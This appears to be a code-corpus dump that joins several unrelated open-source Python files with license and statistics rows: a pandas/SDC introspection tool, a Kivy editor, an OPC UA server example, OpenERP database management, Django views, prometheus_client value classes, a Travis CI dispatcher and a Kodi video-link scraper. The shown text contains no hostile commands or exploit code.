if callable(getattr(cls, func)) and not func.startswith('_')]
def get_class_attributes(cls):
"""
Returns the list of class attributes, accessible by both names and as objects.
Function ignores internal attributes starting with ``_``.
:param cls: The class object
:return: List of class attributes, each item is the tuple ``(attribute_name, attribute_object)``
"""
return [(func, getattr(cls, func)) for func in dir(cls)
if not callable(getattr(cls, func)) and not func.startswith('_')]
def get_fully_qualified_name(cls):
"""
Returns fully qualified name of the class.
:param cls: The class object
:return: String, fully qualified name
"""
return repr(cls)[8:-2]
def init_module_structure(module_obj, the_module, inspected, skip_test):
"""
Initializes hierarchical structure ``the_module``.
:param module_obj: Module object being traversed.
:param the_module: Dictionary ``{'module_obj': module_obj, 'submodules': submodules,
'classes': classes, 'functions': functions}``. The ``submodules`` is the list of
submodules that belong to ``module_obj``. Each submodule has the same structure as ``the_module``.
The ``classes`` is the list of classes that belong to ``module_obj``.
        The ``functions`` is the list of functions that belong to ``module_obj``.
:param inspected: Set of already traversed module objects. This set is needed to avoid circular traversal of
        the same module, which may be returned by the ``getmembers`` function multiple times.
    :param skip_test: Function that takes a module object as an argument and returns True if this object
        must be skipped, or False if it should be included in the module structure hierarchy. This function is used as
a mechanism to customize the structure of modules, classes, and functions. This in turn minimizes following
structure traversal costs.
"""
# Returns True if the mod module needs to be ignored
def _is_skip_module(mod):
mod_name = mod.__name__
return '._' in mod_name or mod_name.startswith('_')
# Returns True if the class cls needs to be ignored
def _is_skip_class(cls):
class_name = get_fully_qualified_name(cls)
return '._' in class_name
# Returns True if the object obj needs to be ignored
def _is_internal(obj):
obj_name = obj.__name__
return obj_name.startswith('_')
# ************ The init_module_structure implementation starts here *******************************************
if _is_skip_module(module_obj) or module_obj in inspected or skip_test(module_obj):
return
inspected.add(module_obj)
# Traverse submodules, classes, and functions
submodules = []
classes = []
functions = []
for (name, obj) in getmembers(module_obj): # Iterate through members of the submodule
if skip_test(obj):
continue # Customizable test for skipping objects as needed
if ismodule(obj) and obj not in inspected and not _is_skip_module(obj):
the_submodule = dict()
init_module_structure(obj, the_submodule, inspected, skip_test)
submodules.append(the_submodule)
if isclass(obj) and not _is_skip_class(obj):
classes.append(obj)
if isfunction(obj) and not _is_internal(obj):
functions.append(obj)
the_module['module_obj'] = module_obj
the_module['submodules'] = submodules
the_module['classes'] = classes
the_module['functions'] = functions
def _print_module(the_module, print_submodules_flag=True):
"""
Recursively prints ``the_module`` content. Internal utility function for debugging purposes
:param the_module: Dictionary ``{'module_obj': module_obj, 'submodules': submodules,
'classes': classes, 'functions': functions}``. The ``submodules`` is the list of
submodules that belong to ``module_obj``. Each submodule has the same structure as ``the_module``.
The ``classes`` is the list of classes that belong to ``module_obj``.
        The ``functions`` is the list of functions that belong to ``module_obj``.
"""
print(the_module['module_obj'].__name__)
print(' CLASSES:')
for the_class in the_module['classes']:
print(' - ' + the_class.__name__)
print(' FUNCTIONS:')
for the_func in the_module['functions']:
print(' - ' + the_func.__name__)
if print_submodules_flag:
print(' SUBMODULES:')
for submodule in the_module['submodules']:
_print_module(submodule, print_submodules_flag)
def traverse(the_module, do_action, traverse_submodules_flag=True):
"""
Traverses ``the_module`` and performs action :func:`do_action` on each of the objects of the structure.
:param the_module: Dictionary ``{'module_obj': module_obj, 'submodules': submodules,
'classes': classes, 'functions': functions}``. The ``submodules`` is the list of
submodules that belong to ``module_obj``. Each submodule has the same structure as ``the_module``.
The ``classes`` is the list of classes that belong to ``module_obj``.
        The ``functions`` is the list of functions that belong to ``module_obj``.
    :param do_action: Function that takes one object (a module, class, or function) as input. It returns ``True`` if
traversal needs to be stopped.
:param traverse_submodules_flag: True if function must recursively traverse submodules too
:return: Returns tuple ``(the_module, obj)`` where ``obj`` is the object identified by :func:`do_action` and
``the_module`` is the corresponding dictionary structure to which the object belongs. It returns ``None``
if no object has been identified by the :func:`do_action`
"""
if do_action(the_module['module_obj']):
return the_module, the_module['module_obj']
# Traverse classes of the_module
for the_class in the_module['classes']:
if do_action(the_class):
return the_module, the_class
# Traverse functions of the_module
for the_func in the_module['functions']:
if do_action(the_func):
return the_module, the_func
# Recursively traverse submodules of the_module
if traverse_submodules_flag:
for submodule in the_module['submodules']:
the_tuple = traverse(submodule, do_action, traverse_submodules_flag)
if the_tuple is not None:
return the_tuple
return None
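# --- Illustrative sketch, not part of the original module --------------------
# Hypothetical do_action callback for traverse(): stop at the first object
# named 'DataFrame' and return both the object and the sub-dictionary of
# ``pandas_modules`` it was found in (assumes init_pandas_structure() ran).
def _example_find_dataframe_class():
    init_pandas_structure()
    def _is_dataframe(obj):
        return getattr(obj, '__name__', None) == 'DataFrame'
    found = traverse(pandas_modules, _is_dataframe)
    if found is None:
        return None
    the_module, the_class = found
    return the_module['module_obj'].__name__, the_class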
def get_pandas_module_structure(pandas_obj):
"""
Returns corresponding ``the_module`` dictionary structure to which ``pandas_obj`` belongs to.
This function is typically used in conjunction with :func:`traverse`
:param pandas_obj:
:return: ``the_module`` dictionary structure
"""
def _find(obj):
return obj == pandas_obj
the_module, the_object = traverse(pandas_modules, _find)
return the_module
def init_pandas_structure():
"""
Initializes ``pandas_modules`` global dictionary representing the structure of Pandas.
"""
# Test that allows to ignore certain Pandas submodules, classes, or attributes
def _skip_pandas_test(obj):
if ismodule(obj):
name = obj.__name__
for mod_name in exclude_pandas_submodules:
if name.startswith(mod_name):
return True
return not name.startswith('pandas')
global pandas_modules
pandas_modules = dict()
inspected_mods = set()
init_module_structure(pandas, pandas_modules, inspected_mods, _skip_pandas_test)
def init_sdc_structure():
"""
Initializes ``sdc_modules`` global dictionary representing the structure of Intel SDC.
"""
# Test that allows to ignore certain Intel SDC submodules, classes, or attributes
def _skip_sdc_test(obj):
if ismodule(obj):
name = obj.__name__
for mod_name in exclude_sdc_submodules:
if name.startswith(mod_name):
return True
return not name.startswith('sdc') and not name.startswith('hpat')
global sdc_modules
sdc_modules = dict()
inspected_mods = set()
init_module_structure(sdc, sdc_modules, inspected_mods, _skip_sdc_test)
if __name__ == "__main__":
init_pandas_structure()
_print_module(pandas_modules)
init_sdc_structure()
_print_module(sdc_modules)
init_pandas_sdc_dict()
print(pandas_sdc_dict)
| bsd-2-clause | -2,698,024,070,761,685,500 | 38.78744 | 117 | 0.659301 | false |
rdnetto/Kv-Creator | MainWindow.py | 1 | 2302 |
import kivy.app
import kivy.lang
import traceback
from threading import Thread
from PySide.QtGui import *
from Queue import Queue
from creator_ui import Ui_MainWindow
from kvparser import *
def ErrorHandler(func):
'''Function decorator for displaying exceptions'''
def wrapper(*args, **kwargs):
try:
return func(*args, **kwargs)
except Exception:
traceback.print_exc()
QMessageBox.critical(None, "Error", traceback.format_exc())
QApplication.exit(1)
return wrapper
class MainWindow(Ui_MainWindow, QMainWindow):
def __init__(self, parent=None):
super(MainWindow, self).__init__(parent)
self.setupUi(self)
self.demoThread = None
self.actionOpen.triggered.connect(self.openFile)
self.actionSave.triggered.connect(self.saveFile)
@ErrorHandler
def openFile(self):
if(self.demoThread is not None and self.demoThread.is_alive()):
raise Exception("File already open")
# graphically load file in kivy thread
rootQueue = Queue()
path = "test.kv"
self.demoThread = Thread(name="kivy", target=demo, args=[path, rootQueue])
self.demoThread.daemon = True
self.demoThread.start()
self.rootWidget = rootQueue.get()
# load source and correspond to graphical objects
self.kvfile = KvFile(path)
if(self.rootWidget is None):
raise Exception("Failed to load file")
else:
self.kvfile.rootRule.populate(self.rootWidget)
print("Parsed and corresponded kv file:")
print("\n".join(map(str, self.kvfile.elements)))
@ErrorHandler
def saveFile(self):
if(self.kvfile is None):
raise Exception("No file open")
self.kvfile.save()
def demo(path, rootQueue):
'''Event loop for demo application
path: the .kv file to load
rootQueue: a Queue that the root widget should be pushed onto (or None if creation fails)
'''
def _build():
try:
root = kivy.lang.Builder.load_file(path)
rootQueue.put(root)
return root
except:
rootQueue.put(None)
raise
app = kivy.app.App()
app.build = _build
app.run()
| gpl-2.0 | 8,181,468,927,837,841,000 | 24.577778 | 93 | 0.619461 | false |
alkor/python-opcua | examples/minimal-server-with-encryption.py | 1 | 1176 | import sys
sys.path.insert(0, "..")
import time
from opcua import ua, Server
if __name__ == "__main__":
# setup our server
server = Server()
server.set_endpoint("opc.tcp://0.0.0.0:4841/freeopcua/server/")
# load server certificate and private key. This enables endpoints
# with signing and encryption.
server.load_certificate("example-certificate.der")
server.load_private_key("example-private-key.pem")
    # setup our own namespace, not really necessary but recommended by the spec
uri = "http://examples.freeopcua.github.io"
idx = server.register_namespace(uri)
# get Objects node, this is where we should put our custom stuff
objects = server.get_objects_node()
# populating our address space
myobj = objects.add_object(idx, "MyObject")
myvar = myobj.add_variable(idx, "MyVariable", 6.7)
myvar.set_writable() # Set MyVariable to be writable by clients
# starting!
server.start()
try:
count = 0
while True:
time.sleep(1)
count += 0.1
myvar.set_value(count)
finally:
#close connection, remove subcsriptions, etc
server.stop()
| lgpl-3.0 | -747,732,777,772,497,200 | 27 | 70 | 0.644558 | false |
ttfseiko/openerp-trunk | openerp/service/db.py | 1 | 14915 | # -*- coding: utf-8 -*-
from contextlib import closing
from functools import wraps
import logging
import os
import shutil
import threading
import traceback
import tempfile
import zipfile
import psycopg2
import openerp
from openerp import SUPERUSER_ID
import openerp.release
import openerp.sql_db
import openerp.tools
import security
_logger = logging.getLogger(__name__)
self_actions = {}
self_id = 0
self_id_protect = threading.Semaphore()
# This should be moved to openerp.modules.db, alongside initialize().
def _initialize_db(id, db_name, demo, lang, user_password):
try:
self_actions[id]['progress'] = 0
db = openerp.sql_db.db_connect(db_name)
with closing(db.cursor()) as cr:
# TODO this should be removed as it is done by RegistryManager.new().
openerp.modules.db.initialize(cr)
openerp.tools.config['lang'] = lang
cr.commit()
registry = openerp.modules.registry.RegistryManager.new(
db_name, demo, self_actions[id], update_module=True)
with closing(db.cursor()) as cr:
if lang:
modobj = registry['ir.module.module']
mids = modobj.search(cr, SUPERUSER_ID, [('state', '=', 'installed')])
modobj.update_translations(cr, SUPERUSER_ID, mids, lang)
# update admin's password and lang
values = {'password': user_password, 'lang': lang}
registry['res.users'].write(cr, SUPERUSER_ID, [SUPERUSER_ID], values)
cr.execute('SELECT login, password FROM res_users ORDER BY login')
self_actions[id].update(users=cr.dictfetchall(), clean=True)
cr.commit()
except Exception, e:
self_actions[id].update(clean=False, exception=e)
_logger.exception('CREATE DATABASE failed:')
self_actions[id]['traceback'] = traceback.format_exc()
def dispatch(method, params):
if method in ['create', 'get_progress', 'drop', 'dump', 'restore', 'rename',
'change_admin_password', 'migrate_databases',
'create_database', 'duplicate_database']:
passwd = params[0]
params = params[1:]
security.check_super(passwd)
elif method in ['db_exist', 'list', 'list_lang', 'server_version']:
# params = params
# No security check for these methods
pass
else:
raise KeyError("Method not found: %s" % method)
fn = globals()['exp_' + method]
return fn(*params)
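# --- Illustrative sketch, not part of the original module --------------------
# How a call flows through dispatch(): methods in the second branch above
# (e.g. 'db_exist', 'list', 'server_version') need no super-admin password,
# so the params are forwarded to the matching exp_* function unchanged.
def _example_dispatch_db_exist(db_name):
    # equivalent to calling exp_db_exist(db_name) directly
    return dispatch('db_exist', (db_name,))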
def _create_empty_database(name):
db = openerp.sql_db.db_connect('postgres')
with closing(db.cursor()) as cr:
chosen_template = openerp.tools.config['db_template']
cr.execute("SELECT datname FROM pg_database WHERE datname = %s",
(name,))
if cr.fetchall():
raise openerp.exceptions.Warning("database %r already exists!" % (name,))
else:
cr.autocommit(True) # avoid transaction block
cr.execute("""CREATE DATABASE "%s" ENCODING 'unicode' TEMPLATE "%s" """ % (name, chosen_template))
def exp_create(db_name, demo, lang, user_password='admin'):
self_id_protect.acquire()
global self_id
self_id += 1
id = self_id
self_id_protect.release()
self_actions[id] = {'clean': False}
_create_empty_database(db_name)
_logger.info('CREATE DATABASE %s', db_name.lower())
create_thread = threading.Thread(target=_initialize_db,
args=(id, db_name, demo, lang, user_password))
create_thread.start()
self_actions[id]['thread'] = create_thread
return id
def exp_create_database(db_name, demo, lang, user_password='admin'):
""" Similar to exp_create but blocking."""
self_id_protect.acquire()
global self_id
self_id += 1
id = self_id
self_id_protect.release()
self_actions[id] = {'clean': False}
_logger.info('Create database `%s`.', db_name)
_create_empty_database(db_name)
_initialize_db(id, db_name, demo, lang, user_password)
return True
def exp_duplicate_database(db_original_name, db_name):
_logger.info('Duplicate database `%s` to `%s`.', db_original_name, db_name)
openerp.sql_db.close_db(db_original_name)
db = openerp.sql_db.db_connect('postgres')
with closing(db.cursor()) as cr:
cr.autocommit(True) # avoid transaction block
cr.execute("""CREATE DATABASE "%s" ENCODING 'unicode' TEMPLATE "%s" """ % (db_name, db_original_name))
return True
def exp_get_progress(id):
if self_actions[id]['thread'].isAlive():
# return openerp.modules.init_progress[db_name]
return min(self_actions[id].get('progress', 0), 0.95), []
else:
clean = self_actions[id]['clean']
if clean:
users = self_actions[id]['users']
for user in users:
# Remove the None passwords as they can't be marshalled by XML-RPC.
if user['password'] is None:
user['password'] = ''
self_actions.pop(id)
return 1.0, users
else:
a = self_actions.pop(id)
exc, tb = a['exception'], a['traceback']
raise Exception, exc, tb
def exp_drop(db_name):
if db_name not in exp_list(True):
return False
openerp.modules.registry.RegistryManager.delete(db_name)
openerp.sql_db.close_db(db_name)
db = openerp.sql_db.db_connect('postgres')
with closing(db.cursor()) as cr:
cr.autocommit(True) # avoid transaction block
# Try to terminate all other connections that might prevent
# dropping the database
try:
# PostgreSQL 9.2 renamed pg_stat_activity.procpid to pid:
# http://www.postgresql.org/docs/9.2/static/release-9-2.html#AEN110389
pid_col = 'pid' if cr._cnx.server_version >= 90200 else 'procpid'
cr.execute("""SELECT pg_terminate_backend(%(pid_col)s)
FROM pg_stat_activity
WHERE datname = %%s AND
%(pid_col)s != pg_backend_pid()""" % {'pid_col': pid_col},
(db_name,))
except Exception:
pass
try:
cr.execute('DROP DATABASE "%s"' % db_name)
except Exception, e:
_logger.error('DROP DB: %s failed:\n%s', db_name, e)
raise Exception("Couldn't drop database %s: %s" % (db_name, e))
else:
_logger.info('DROP DB: %s', db_name)
return True
def _set_pg_password_in_environment(func):
""" On systems where pg_restore/pg_dump require an explicit
password (i.e. when not connecting via unix sockets, and most
importantly on Windows), it is necessary to pass the PG user
password in the environment or in a special .pgpass file.
This decorator handles setting
:envvar:`PGPASSWORD` if it is not already
set, and removing it afterwards.
See also http://www.postgresql.org/docs/8.4/static/libpq-envars.html
.. note:: This is not thread-safe, and should never be enabled for
SaaS (giving SaaS users the super-admin password is not a good idea
anyway)
"""
@wraps(func)
def wrapper(*args, **kwargs):
if os.environ.get('PGPASSWORD') or not openerp.tools.config['db_password']:
return func(*args, **kwargs)
else:
os.environ['PGPASSWORD'] = openerp.tools.config['db_password']
try:
return func(*args, **kwargs)
finally:
del os.environ['PGPASSWORD']
return wrapper
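# --- Illustrative sketch, not part of the original module --------------------
# The decorator above is meant for helpers that shell out to PostgreSQL tools,
# as exp_dump()/restore_db() below do.  A hypothetical minimal use:
@_set_pg_password_in_environment
def _example_list_databases():
    # PGPASSWORD is exported around this call when db_password is configured.
    cmd = ['psql', '--list', '--tuples-only']
    if openerp.tools.config['db_user']:
        cmd.append('--username=' + openerp.tools.config['db_user'])
    if openerp.tools.config['db_host']:
        cmd.append('--host=' + openerp.tools.config['db_host'])
    if openerp.tools.config['db_port']:
        cmd.append('--port=' + str(openerp.tools.config['db_port']))
    return openerp.tools.exec_pg_command(*cmd)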
def exp_dump(db_name):
with tempfile.TemporaryFile() as t:
dump_db(db_name, t)
t.seek(0)
return t.read().encode('base64')
@_set_pg_password_in_environment
def dump_db(db, stream):
"""Dump database `db` into file-like object `stream`"""
with openerp.tools.osutil.tempdir() as dump_dir:
registry = openerp.modules.registry.RegistryManager.get(db)
with registry.cursor() as cr:
filestore = registry['ir.attachment']._filestore(cr, SUPERUSER_ID)
if os.path.exists(filestore):
shutil.copytree(filestore, os.path.join(dump_dir, 'filestore'))
dump_file = os.path.join(dump_dir, 'dump.sql')
cmd = ['pg_dump', '--format=p', '--no-owner', '--file=' + dump_file]
if openerp.tools.config['db_user']:
cmd.append('--username=' + openerp.tools.config['db_user'])
if openerp.tools.config['db_host']:
cmd.append('--host=' + openerp.tools.config['db_host'])
if openerp.tools.config['db_port']:
cmd.append('--port=' + str(openerp.tools.config['db_port']))
cmd.append(db)
if openerp.tools.exec_pg_command(*cmd):
_logger.error('DUMP DB: %s failed! Please verify the configuration of the database '
'password on the server. You may need to create a .pgpass file for '
'authentication, or specify `db_password` in the server configuration '
'file.', db)
raise Exception("Couldn't dump database")
openerp.tools.osutil.zip_dir(dump_dir, stream, include_dir=False)
_logger.info('DUMP DB successful: %s', db)
def exp_restore(db_name, data, copy=False):
data_file = tempfile.NamedTemporaryFile(delete=False)
try:
data_file.write(data.decode('base64'))
data_file.close()
restore_db(db_name, data_file.name, copy=copy)
finally:
os.unlink(data_file.name)
return True
@_set_pg_password_in_environment
def restore_db(db, dump_file, copy=False):
assert isinstance(db, basestring)
if exp_db_exist(db):
_logger.warning('RESTORE DB: %s already exists', db)
raise Exception("Database already exists")
_create_empty_database(db)
filestore_path = None
with openerp.tools.osutil.tempdir() as dump_dir:
if zipfile.is_zipfile(dump_file):
# v8 format
with zipfile.ZipFile(dump_file, 'r') as z:
# only extract known members!
filestore = [m for m in z.namelist() if m.startswith('filestore/')]
z.extractall(dump_dir, ['dump.sql'] + filestore)
if filestore:
filestore_path = os.path.join(dump_dir, 'filestore')
pg_cmd = 'psql'
pg_args = ['-q', '-f', os.path.join(dump_dir, 'dump.sql')]
else:
# <= 7.0 format (raw pg_dump output)
pg_cmd = 'pg_restore'
pg_args = ['--no-owner', dump_file]
args = []
if openerp.tools.config['db_user']:
args.append('--username=' + openerp.tools.config['db_user'])
if openerp.tools.config['db_host']:
args.append('--host=' + openerp.tools.config['db_host'])
if openerp.tools.config['db_port']:
args.append('--port=' + str(openerp.tools.config['db_port']))
args.append('--dbname=' + db)
pg_args = args + pg_args
if openerp.tools.exec_pg_command(pg_cmd, *pg_args):
raise Exception("Couldn't restore database")
registry = openerp.modules.registry.RegistryManager.new(db)
with registry.cursor() as cr:
if copy:
# if it's a copy of a database, force generation of a new dbuuid
registry['ir.config_parameter'].init(cr, force=True)
if filestore_path:
filestore_dest = registry['ir.attachment']._filestore(cr, SUPERUSER_ID)
shutil.move(filestore_path, filestore_dest)
if openerp.tools.config['unaccent']:
try:
with cr.savepoint():
cr.execute("CREATE EXTENSION unaccent")
except psycopg2.Error:
pass
_logger.info('RESTORE DB: %s', db)
def exp_rename(old_name, new_name):
openerp.modules.registry.RegistryManager.delete(old_name)
openerp.sql_db.close_db(old_name)
db = openerp.sql_db.db_connect('postgres')
with closing(db.cursor()) as cr:
cr.autocommit(True) # avoid transaction block
try:
cr.execute('ALTER DATABASE "%s" RENAME TO "%s"' % (old_name, new_name))
_logger.info('RENAME DB: %s -> %s', old_name, new_name)
except Exception, e:
_logger.error('RENAME DB: %s -> %s failed:\n%s', old_name, new_name, e)
raise Exception("Couldn't rename database %s to %s: %s" % (old_name, new_name, e))
return True
@openerp.tools.mute_logger('openerp.sql_db')
def exp_db_exist(db_name):
    ## Not a true existence check: it only verifies that a connection to the database is possible; the database may exist even if this fails.
return bool(openerp.sql_db.db_connect(db_name))
def exp_list(document=False):
if not openerp.tools.config['list_db'] and not document:
raise openerp.exceptions.AccessDenied()
chosen_template = openerp.tools.config['db_template']
templates_list = tuple(set(['template0', 'template1', 'postgres', chosen_template]))
db = openerp.sql_db.db_connect('postgres')
with closing(db.cursor()) as cr:
try:
db_user = openerp.tools.config["db_user"]
if not db_user and os.name == 'posix':
import pwd
db_user = pwd.getpwuid(os.getuid())[0]
if not db_user:
cr.execute("select usename from pg_user where usesysid=(select datdba from pg_database where datname=%s)", (openerp.tools.config["db_name"],))
res = cr.fetchone()
db_user = res and str(res[0])
if db_user:
cr.execute("select datname from pg_database where datdba=(select usesysid from pg_user where usename=%s) and datname not in %s order by datname", (db_user, templates_list))
else:
cr.execute("select datname from pg_database where datname not in %s order by datname", (templates_list,))
res = [openerp.tools.ustr(name) for (name,) in cr.fetchall()]
except Exception:
res = []
res.sort()
return res
def exp_change_admin_password(new_password):
openerp.tools.config['admin_passwd'] = new_password
openerp.tools.config.save()
return True
def exp_list_lang():
return openerp.tools.scan_languages()
def exp_server_version():
""" Return the version of the server
Used by the client to verify the compatibility with its own version
"""
return openerp.release.version
def exp_migrate_databases(databases):
for db in databases:
_logger.info('migrate database %s', db)
openerp.tools.config['update']['base'] = True
openerp.modules.registry.RegistryManager.new(db, force_demo=False, update_module=True)
return True
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | -292,634,373,570,825,700 | 37.74026 | 188 | 0.600268 | false |
rphlo/django-seuranta | seuranta/app/views.py | 1 | 2277 | from django.contrib.auth.decorators import login_required
from django.core.exceptions import PermissionDenied
from django.shortcuts import render, get_object_or_404
from django.utils.timezone import now
from seuranta.models import Competition
@login_required
def own_competitions(request):
user = request.user
comps = Competition.objects.filter(publisher=user)
return render(request,
'seuranta/own_competitions.html',
{'competitions': comps})
@login_required
def create_competition(request):
return render(request,
'seuranta/create_competition.html')
@login_required
def edit_competition(request, competition_id):
competition = get_object_or_404(Competition, id=competition_id)
if competition.publisher != request.user:
raise PermissionDenied
return render(request,
'seuranta/edit_competition.html',
{'competition': competition})
@login_required
def edit_map(request, competition_id):
competition = get_object_or_404(Competition, id=competition_id)
if competition.publisher != request.user:
raise PermissionDenied
return render(request,
'seuranta/edit_map.html',
{'competition': competition})
@login_required
def edit_competitors(request, competition_id):
competition = get_object_or_404(Competition, id=competition_id)
if competition.publisher != request.user:
raise PermissionDenied
return render(request,
'seuranta/edit_competitors.html',
{'competition': competition})
def list_competitions(request):
ts = now()
qs = Competition.objects.all()
live = qs.filter(
start_date__lte=ts,
end_date__gte=ts,
publication_policy="public"
).order_by('start_date')
upcoming = qs.filter(
start_date__gt=ts,
end_date__gt=ts,
publication_policy="public"
).order_by('start_date')
past = qs.filter(
start_date__lt=ts,
end_date__lt=ts,
publication_policy="public"
).order_by('-end_date')
return render(request,
'seuranta/list_competitions.html',
{'live': live, 'upcoming': upcoming, 'past': past})
| mit | -2,442,262,479,194,042,000 | 29.77027 | 69 | 0.646465 | false |
prometheus/client_python | prometheus_client/values.py | 1 | 4369 | from __future__ import unicode_literals
import os
from threading import Lock
import warnings
from .mmap_dict import mmap_key, MmapedDict
class MutexValue(object):
"""A float protected by a mutex."""
_multiprocess = False
def __init__(self, typ, metric_name, name, labelnames, labelvalues, **kwargs):
self._value = 0.0
self._lock = Lock()
def inc(self, amount):
with self._lock:
self._value += amount
def set(self, value):
with self._lock:
self._value = value
def get(self):
with self._lock:
return self._value
def MultiProcessValue(process_identifier=os.getpid):
"""Returns a MmapedValue class based on a process_identifier function.
The 'process_identifier' function MUST comply with this simple rule:
when called in simultaneously running processes it MUST return distinct values.
Using a different function than the default 'os.getpid' is at your own risk.
"""
files = {}
values = []
pid = {'value': process_identifier()}
# Use a single global lock when in multi-processing mode
# as we presume this means there is no threading going on.
# This avoids the need to also have mutexes in __MmapDict.
lock = Lock()
class MmapedValue(object):
"""A float protected by a mutex backed by a per-process mmaped file."""
_multiprocess = True
def __init__(self, typ, metric_name, name, labelnames, labelvalues, multiprocess_mode='', **kwargs):
self._params = typ, metric_name, name, labelnames, labelvalues, multiprocess_mode
# This deprecation warning can go away in a few releases when removing the compatibility
if 'prometheus_multiproc_dir' in os.environ and 'PROMETHEUS_MULTIPROC_DIR' not in os.environ:
os.environ['PROMETHEUS_MULTIPROC_DIR'] = os.environ['prometheus_multiproc_dir']
warnings.warn("prometheus_multiproc_dir variable has been deprecated in favor of the upper case naming PROMETHEUS_MULTIPROC_DIR", DeprecationWarning)
with lock:
self.__check_for_pid_change()
self.__reset()
values.append(self)
def __reset(self):
typ, metric_name, name, labelnames, labelvalues, multiprocess_mode = self._params
if typ == 'gauge':
file_prefix = typ + '_' + multiprocess_mode
else:
file_prefix = typ
if file_prefix not in files:
filename = os.path.join(
os.environ.get('PROMETHEUS_MULTIPROC_DIR'),
'{0}_{1}.db'.format(file_prefix, pid['value']))
files[file_prefix] = MmapedDict(filename)
self._file = files[file_prefix]
self._key = mmap_key(metric_name, name, labelnames, labelvalues)
self._value = self._file.read_value(self._key)
def __check_for_pid_change(self):
actual_pid = process_identifier()
if pid['value'] != actual_pid:
pid['value'] = actual_pid
# There has been a fork(), reset all the values.
for f in files.values():
f.close()
files.clear()
for value in values:
value.__reset()
def inc(self, amount):
with lock:
self.__check_for_pid_change()
self._value += amount
self._file.write_value(self._key, self._value)
def set(self, value):
with lock:
self.__check_for_pid_change()
self._value = value
self._file.write_value(self._key, self._value)
def get(self):
with lock:
self.__check_for_pid_change()
return self._value
return MmapedValue
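# Illustrative sketch (not part of the original module): MultiProcessValue is
# normally used with the default os.getpid, but any callable returning a value
# that is distinct for simultaneously running processes is accepted, e.g. a
# pre-fork server could supply its own worker identifier:
#
#   def _worker_ident():               # hypothetical helper; must differ
#       return os.getpid()             # between concurrently running processes
#
#   WorkerMmapedValue = MultiProcessValue(process_identifier=_worker_ident)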
def get_value_class():
# Should we enable multi-process mode?
# This needs to be chosen before the first metric is constructed,
# and as that may be in some arbitrary library the user/admin has
# no control over we use an environment variable.
if 'prometheus_multiproc_dir' in os.environ or 'PROMETHEUS_MULTIPROC_DIR' in os.environ:
return MultiProcessValue()
else:
return MutexValue
ValueClass = get_value_class()
| apache-2.0 | 4,736,157,789,706,635,000 | 34.811475 | 165 | 0.590753 | false |
ownport/local-ci | local_ci/travis.py | 1 | 2167 | # -*- coding: utf-8 -*-
import os
import re
import utils
from dispatchers import BaseDispatcher
BASH_SCRIPT_TEMPLATE='''#!/bin/bash'''
RE_ENV_PATTERN=re.compile(r'^.+?=.+?$')
CI_STAGES = [
'before_install', 'install',
'before_script', 'script',
'after_success', 'after_failure',
'before_deploy', 'deploy', 'after_deploy',
'after_script',
]
SUPPORTED_CI_STAGES = [
'install',
'script',
]
class TravisRepoDispatcher(BaseDispatcher):
def __init__(self, path, settings):
super(TravisRepoDispatcher, self).__init__(path, settings)
self._travisyml_path = os.path.join(self.repo_path, '.travis.yml')
if not os.path.exists(self._travisyml_path):
raise IOError('The file .travis.yml does not exist in the directory %s' % self.repo_path)
self._travisyml = utils.read_yaml(self._travisyml_path)
def docker_images(self):
''' returns the list of docker images
'''
language = self._travisyml.get('language', None)
if not language:
            raise RuntimeError("The language variable is missing in the configuration file")
versions = self._travisyml.get(language, None)
if not versions:
            raise RuntimeError("The '%s' variable is missing in the configuration file" % language)
return [self.get_docker_image(':'.join((language, str(ver))))
for ver in versions]
def script(self):
''' returns the script for execution in docker container
'''
script = ['#!/bin/sh',]
env_vars = list(self._travisyml.get('env', []))
env_vars.extend(list(self.settings.get('env', [])))
script.extend(['\n# Environment variables'])
script.extend([ "export %s" % e for e in env_vars if RE_ENV_PATTERN.match(e) ])
for stage in SUPPORTED_CI_STAGES:
stage_actions = self._travisyml.get(stage, None)
            if stage == 'install' and stage_actions:
stage_actions.append('cd /repo')
if stage_actions:
script.extend(['\n# Stage: %s' % stage,])
script.extend(stage_actions)
return '\n'.join(script)
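# Illustrative usage sketch (not part of the original module); the repository
# path and settings below are made up for the example:
#
#   dispatcher = TravisRepoDispatcher('/path/to/repo', {'env': ['FOO=bar']})
#   for image in dispatcher.docker_images():
#       print(image)
#   print(dispatcher.script())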
| apache-2.0 | 3,065,606,958,559,906,000 | 28.283784 | 101 | 0.595293 | false |
alfa-jor/addon | plugin.video.alfa/servers/gvideo.py | 1 | 2665 | # -*- coding: utf-8 -*-
import urllib
from core import httptools
from core import scrapertools
from platformcode import logger
def test_video_exists(page_url):
if 'googleusercontent' in page_url:
        return True, "" # verification disabled because it stalls!
response = httptools.downloadpage(page_url, headers={"Referer": page_url})
global page
page = response
if "no+existe" in response.data or 'no existe.</p>' in response.data:
return False, "[gvideo] El video no existe o ha sido borrado"
if "Se+ha+excedido+el" in response.data:
return False, "[gvideo] Se ha excedido el número de reproducciones permitidas"
if "No+tienes+permiso" in response.data:
return False, "[gvideo] No tienes permiso para acceder a este video"
if "Se ha producido un error" in response.data:
return False, "[gvideo] Se ha producido un error en el reproductor de google"
if "No+se+puede+procesar+este" in response.data:
return False, "[gvideo] No se puede procesar este video"
if response.code == 429:
return False, "[gvideo] Demasiadas conexiones al servidor, inténtelo después"
return True, ""
def get_video_url(page_url, user="", password="", video_password=""):
logger.info()
video_urls = []
urls = []
streams =[]
logger.debug('page_url: %s'%page_url)
if 'googleusercontent' in page_url:
url = page_url
headers_string = httptools.get_url_headers(page_url, forced=True)
quality = scrapertools.find_single_match (url, '.itag=(\d+).')
if not quality:
quality = '59'
streams.append((quality, url))
else:
data = page.data
bloque= scrapertools.find_single_match(data, 'url_encoded_fmt_stream_map(.*)')
if bloque:
data = bloque
data = data.decode('unicode-escape', errors='replace')
data = urllib.unquote_plus(urllib.unquote_plus(data))
headers_string = httptools.get_url_headers(page_url, forced=True)
streams = scrapertools.find_multiple_matches(data,
'itag=(\d+)&url=(.*?)(?:;.*?quality=.*?(?:,|&)|&quality=.*?(?:,|&))')
itags = {'18': '360p', '22': '720p', '34': '360p', '35': '480p', '37': '1080p', '43': '360p', '59': '480p'}
for itag, video_url in streams:
if not video_url in urls:
video_url += headers_string
video_urls.append([itags.get(itag, ''), video_url])
urls.append(video_url)
video_urls.sort(key=lambda video_urls: int(video_urls[0].replace("p", "")))
return video_urls
| gpl-3.0 | 4,788,274,870,246,898,000 | 35.452055 | 122 | 0.606539 | false |
ainafp/nilearn | plot_haxby_different_estimators.py | 1 | 5881 | """
Different classifiers in decoding the Haxby dataset
=====================================================
Here we compare different classifiers on a visual object recognition
decoding task.
